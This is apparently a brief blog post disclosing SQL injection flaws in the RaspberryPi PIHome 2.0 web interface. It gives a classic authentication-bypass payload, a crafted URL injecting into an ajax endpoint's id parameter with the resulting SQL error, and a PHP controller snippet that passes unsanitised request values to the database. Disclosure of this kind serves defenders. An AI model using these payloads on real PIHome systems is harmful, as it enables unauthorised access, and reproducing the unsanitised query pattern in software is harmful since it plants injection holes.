RaspberryPi PIHome 2.0 Sql injection

Vendor : http://pihome.harkemedia.de/
Web based application demo : https://www.youtube.com/watch?v=dADgi6LqIMQ
Github: https://github.com/cerosx/RPI.PIHome2.0-GUI-Frontend

1)Auth bypass PoC with or statement : ‘ or ‘1’=’1 —
2)Recursive fuzzing in ajax method second PoC

http://localhost/index.php?c=home&a=set&id=1%27+order+by+1111--_on

SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; 

Snippet from source code :

public function updateaktivAction()
  { 
        if($_GET['id']!=""){
            require_once 'models/homeModel.php';
            $model = new homeModel();
            echo $model->updateDeviceAktiv($_GET['id'], $_GET['set']);
        }
  }
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s